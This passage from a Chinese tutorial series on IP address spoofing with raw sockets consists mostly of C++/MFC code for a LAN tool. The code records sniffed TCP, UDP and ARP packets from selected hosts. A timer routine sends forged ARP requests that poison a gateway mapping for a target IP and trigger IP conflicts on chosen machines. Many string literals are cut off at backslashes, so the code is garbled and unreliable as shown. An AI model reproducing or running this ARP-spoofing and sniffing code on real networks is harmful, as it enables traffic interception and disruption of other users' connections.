原始套接字透析之实现IP地址欺骗(4)

switch (ip->proto) {

case IPPROTO_TCP:

TCP_HEADER *pTcpHeader;

pTcpHeader = (TCP_HEADER*)(pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4);

packetList[currentPktIndex].srcPort = ntohs(pTcpHeader->th_sport); packetList[currentPktIndex].desPort = ntohs(pTcpHeader->th_dport);

memcpy(packetList[currentPktIndex].data, pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4+20, 255);

packetList[currentPktIndex].data[255] = 0; break;

case IPPROTO_UDP:

UDP_HEADER *pUdpHeader;

pUdpHeader = (UDP_HEADER*)(pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4);

packetList[currentPktIndex].srcPort = ntohs(pUdpHeader->uh_sport); packetList[currentPktIndex].desPort = ntohs(pUdpHeader->uh_dport); memcpy(packetList[currentPktIndex].data, pChar + sizeof(ETHDR) + (ip->h_lenver &0xf) *4+sizeof(UDP_HEADER), 256); packetList[currentPktIndex].data[255] = 0; break; default:

packetList[currentPktIndex].data[0] = 0; break; }

currentPktIndex++;

currentPktIndex %= MAX_PACKET; if (currentPktIndex == 0)

mailDlg->PostMessage(RECV_PKT); break; } } continue; }

else if (eth->eh_type == htons(ETH_ARP)) {

if (arp->arp_tpa == htonl(myip) && arp->arp_opt == htons(ARP_REPLY)) { int i;

for (i = 0; i < currentHstIndex; i++) {

if (hostList[i].ip == arp->arp_spa)

{ break; } }

if (i >= currentHstIndex) {

hostList[currentHstIndex].ip = arp->arp_spa;

memcpy(hostList[currentHstIndex].mac, eth->eh_src, 6); currentHstIndex++; } }

else if (arp->arp_spa == htonl(myip) && arp->arp_opt == htons(ARP_REPLY)) memcpy(mmac, eth->eh_src, 6); for (int i = 0; i < oldHstIndex; i++) {

if ((oldHostList[i].ip == arp->arp_spa || oldHostList[i].ip == arp ->arp_tpa) && oldHostList[i].sniffer == 1) {

packetList[currentPktIndex].srcIp = arp->arp_spa; packetList[currentPktIndex].desIp = arp->arp_tpa; packetList[currentPktIndex].protocol = ARP; packetList[currentPktIndex].data[0] = 0;

currentPktIndex++;

currentPktIndex %= MAX_PACKET; if (currentPktIndex == 0)

mailDlg->PostMessage(RECV_PKT); break; } } } } }

我们需要动态追踪局域网内节点的活动状态，以定时器实现：

void CNetHackerDlg::OnTimer(UINT nIDEvent) {

// TODO: Add your message handler code here and/or call default if (sthread == 0) {

if (!mmac[0] && !mmac[1] && !mmac[2] && !mmac[3] && !mmac[4] && !mmac[5]) {

SendArpReq(1, myip, mmac); return ;

}

sthread = CreateThread(NULL, 0, CheckHost, 0, 0, 0); SetTimer(1, 7 *(toip - fromip), NULL); //启动定时器 }

if (WaitForSingleObject(sthread, 0) != WAIT_OBJECT_0) { return ; }

//test using self host

/* hostList[currentHstIndex].sniffer = 1; hostList[currentHstIndex].ipConflict = 0; hostList[currentHstIndex].arpCheat = 0; hostList[currentHstIndex].ip = htonl(myip); hostList[currentHstIndex].ipConflict = 1; hostList[currentHstIndex].arpCheat = 1;

memcpy(hostList[currentHstIndex].mac,mmac,6); currentHstIndex++; */ int i, j;

for (i = 0; i < currentHstIndex; i++) {

for (j = 0; j < oldHstIndex; j++) {

if (oldHostList[j].ip == hostList[i].ip) {

hostList[i].sniffer = oldHostList[j].sniffer; hostList[i].ipConflict = oldHostList[j].ipConflict; hostList[i].arpCheat = oldHostList[j].arpCheat; break; } } }

SetTimer(1, 20000, NULL);

for (i = m_hostList.nVWndPos / 13, j = 0; i < currentHstIndex; i++, j++) {

CString str;

m_hostList.SetText(j + 1, 0, inet_ntoa(*(struct in_addr*)(&(hostList[i].ip)) ));

if (hostList[i].sniffer == 0)

m_hostList.SetText(j + 1, 2, \

else

m_hostList.SetText(j + 1, 2, \

str.Format(\ hostList[i].mac[1], hostList[i].mac[2], hostList[i].mac[3], hostList[i].mac[4], hostList[i].mac[5]); m_hostList.SetText(i + 1, 1, str);

if (hostList[i].arpCheat == 0)

m_hostList.SetText(j + 1, 3, \ else

m_hostList.SetText(j + 1, 3, \ if (hostList[i].ipConflict == 0)

m_hostList.SetText(j + 1, 4, \ else

m_hostList.SetText(j + 1, 4, \}

for (; j < 31; j++) {

for (int k = 0; k < 5; k++) m_hostList.SetText(j + 1, k, \}

m_hostList.Invalidate();

unsigned char mac[6]; memcpy(mac, mmac, 4); mac[5] = rand();

for (i = 0; i < currentHstIndex; i++) {

unsigned long ip;

if (hostList[i].arpCheat == 1) {

ip = (hostList[i].ip &0xff) << 24; ip += (hostList[i].ip &0xff00) << 8; ip += (hostList[i].ip &0xff0000) >> 8; ip += (hostList[i].ip &0xff000000) >> 24; SendArpReq(gateip, ip, mac); //网关->欺骗IP }

if (hostList[i].ipConflict == 1) {

ip = (hostList[i].ip &0xff) << 24; ip += (hostList[i].ip &0xff00) << 8; ip += (hostList[i].ip &0xff0000) >> 8; ip += (hostList[i].ip &0xff000000) >> 24;

SendArpReq(ip, 2, mac); } }

memcpy(oldHostList, hostList, sizeof(HostList) *MAX_HOST); oldHstIndex = currentHstIndex; currentHstIndex = 0;

OnRecvPkt();

sthread = CreateThread(NULL, 0, CheckHost, 0, 0, 0); CDialog::OnTimer(nIDEvent); }

Sniffer到需要监听节点的报文后，sniffer线程会主动给对话框发送消息，以更新显示：

void CNetHackerDlg::OnRecvPkt() {

CString str;

for (int i = 1; i <= MAX_PACKET; i++) {

if (!packetList[i - 1].srcIp) break;

m_packetList.SetText(i, 0, inet_ntoa(*(struct in_addr*)(&(packetList[i - 1].srcIp))));

m_packetList.SetText(i, 1, inet_ntoa(*(struct in_addr*)(&(packetList[i - 1].desIp))));

switch (packetList[i - 1].protocol) {

case IPPROTO_TCP:

m_packetList.SetText(i, 2, \ str.Format(\ m_packetList.SetText(i, 3, str);

str.Format(\ m_packetList.SetText(i, 4, str); break;

case IPPROTO_UDP:

m_packetList.SetText(i, 2, \ str.Format(\ m_packetList.SetText(i, 3, str);

str.Format(\ m_packetList.SetText(i, 4, str);